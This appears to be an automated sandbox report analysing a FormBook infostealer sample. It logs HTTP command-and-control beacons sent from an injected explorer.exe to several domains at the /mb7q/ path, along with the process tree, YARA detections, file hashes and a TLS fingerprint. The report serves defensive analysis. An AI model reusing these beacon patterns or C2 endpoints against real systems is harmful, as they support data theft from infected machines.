                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    2192.168.2.4497543.223.115.18580C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:06.855776072 CEST3211OUTGET /mb7q/?yN60IZO0=LCdox3MSFrqgB2UnRRxcW6IJzj2SaKpVJDnxyOZjgJWO5AYJJIYTqL+jJlLhwAlefZ0q&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.hepimizdostuz.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:06.956935883 CEST3218INHTTP/1.1 302 Found
                                                                                                    Cache-Control: private
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Location: https://www.hugedomains.com/domain_profile.cfm?d=hepimizdostuz&e=com
                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                    X-Powered-By: ASP.NET
                                                                                                    Date: Thu, 08 Apr 2021 11:31:01 GMT
                                                                                                    Connection: close
                                                                                                    Content-Length: 189
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 68 65 70 69 6d 69 7a 64 6f 73 74 75 7a 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=hepimizdostuz&amp;e=com">here</a>.</h2></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    3192.168.2.44976252.15.160.16780C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:12.230396032 CEST4993OUTGET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=XnfwGhrIr5kaKJKvTcoJuAoUfO0x4eHAt94m/ubvkhYI6FHew8DVehMKtseK8ovgeTRA HTTP/1.1
                                                                                                    Host: www.hnchotels.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:12.342813969 CEST4994INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 08 Apr 2021 11:31:12 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 153
                                                                                                    Connection: close
                                                                                                    Server: nginx/1.16.1
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    4192.168.2.44976334.102.136.18080C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:17.511185884 CEST6328OUTGET /mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.bookitstaugustine.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:17.628392935 CEST6329INHTTP/1.1 403 Forbidden
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 08 Apr 2021 11:31:17 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 275
                                                                                                    ETag: "605e0138-113"
                                                                                                    Via: 1.1 google
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    5192.168.2.44976481.88.57.7080C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:22.719681978 CEST6353OUTGET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=wg6/7HKVKbWyxm3ocgI2qQ4ybtWVQQxygyNCKw3F9tUQ2TQ7UscRDkS2j2ufAGdI66vr HTTP/1.1
                                                                                                    Host: www.beyju.store
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:22.739568949 CEST6354INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 08 Apr 2021 11:31:22 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 203
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 62 37 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mb7q/ was not found on this server.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    6192.168.2.449765154.210.110.9980C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:28.254085064 CEST6354OUTGET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.szmsbk.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:28.748999119 CEST6355OUTGET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.szmsbk.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:28.944855928 CEST6355INHTTP/1.1 403 Forbidden
                                                                                                    Server: nginx/1.16.1
                                                                                                    Date: Thu, 08 Apr 2021 11:31:28 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 153
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    7192.168.2.449766166.62.28.10780C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:34.124258041 CEST6356OUTGET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr HTTP/1.1
                                                                                                    Host: www.accessibleageing.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:34.663022041 CEST6357INHTTP/1.1 301 Moved Permanently
                                                                                                    Date: Thu, 08 Apr 2021 11:31:34 GMT
                                                                                                    Server: Apache
                                                                                                    X-Powered-By: PHP/7.3.23
                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                    X-Redirect-By: WordPress
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Location: http://accessibleageing.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr
                                                                                                    Vary: User-Agent
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    8192.168.2.449767198.185.159.14480C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:39.824414015 CEST6358OUTGET /mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.theskineditco.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:39.971322060 CEST6359INHTTP/1.1 400 Bad Request
                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                    Content-Length: 77564
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Date: Thu, 08 Apr 2021 11:31:39 UTC
                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                    Pragma: no-cache
                                                                                                    Server: Squarespace
                                                                                                    X-Contextid: cVw5pN8Z/LwlozLxk
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                                                    Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    9192.168.2.44976885.17.172.180C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:50.143712997 CEST6394OUTGET /mb7q/?yN60IZO0=icy9hz7ZIr7yHvDFY6JKJS3opDpdp14zNZwv94Uz6fKXYU2e142cjQElnIAagsV1qBmU&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.thelandcle.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:50.181112051 CEST6394INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 08 Apr 2021 11:31:49 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    HTTPS Packets

                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                    Apr 8, 2021 13:30:05.449109077 CEST104.21.56.119443192.168.2.449727CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Mar 31 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Thu Mar 31 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                    Code Manipulations

                                                                                                    Statistics

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    Analysis Process: PO45937008ADENGY.exe PID: 7024 Parent PID: 5884

                                                                                                    General

                                                                                                    Start time:13:30:04
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\Desktop\PO45937008ADENGY.exe'
                                                                                                    Imagebase:0xac0000
                                                                                                    File size:112640 bytes
                                                                                                    MD5 hash:47EBF3893D8D6DB4ADD1B87AD75495E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    Reputation:low

                                                                                                    Analysis Process: cmd.exe PID: 3684 Parent PID: 7024

                                                                                                    General

                                                                                                    Start time:13:30:08
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                    Imagebase:0x11d0000
                                                                                                    File size:232960 bytes
                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Analysis Process: conhost.exe PID: 1284 Parent PID: 3684

                                                                                                    General

                                                                                                    Start time:13:30:09
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff724c50000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Analysis Process: timeout.exe PID: 1320 Parent PID: 3684

                                                                                                    General

                                                                                                    Start time:13:30:09
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:timeout 1
                                                                                                    Imagebase:0xc60000
                                                                                                    File size:26112 bytes
                                                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Analysis Process: PO45937008ADENGY.exe PID: 6448 Parent PID: 7024

                                                                                                    General

                                                                                                    Start time:13:30:11
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                    Imagebase:0x1f0000
                                                                                                    File size:112640 bytes
                                                                                                    MD5 hash:47EBF3893D8D6DB4ADD1B87AD75495E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low

                                                                                                    Analysis Process: PO45937008ADENGY.exe PID: 612 Parent PID: 7024

                                                                                                    General

                                                                                                    Start time:13:30:11
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                    Imagebase:0x40000
                                                                                                    File size:112640 bytes
                                                                                                    MD5 hash:47EBF3893D8D6DB4ADD1B87AD75495E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low

                                                                                                    Analysis Process: PO45937008ADENGY.exe PID: 6644 Parent PID: 7024

                                                                                                    General

                                                                                                    Start time:13:30:12
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                    Imagebase:0x8d0000
                                                                                                    File size:112640 bytes
                                                                                                    MD5 hash:47EBF3893D8D6DB4ADD1B87AD75495E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, Author: Joe Security
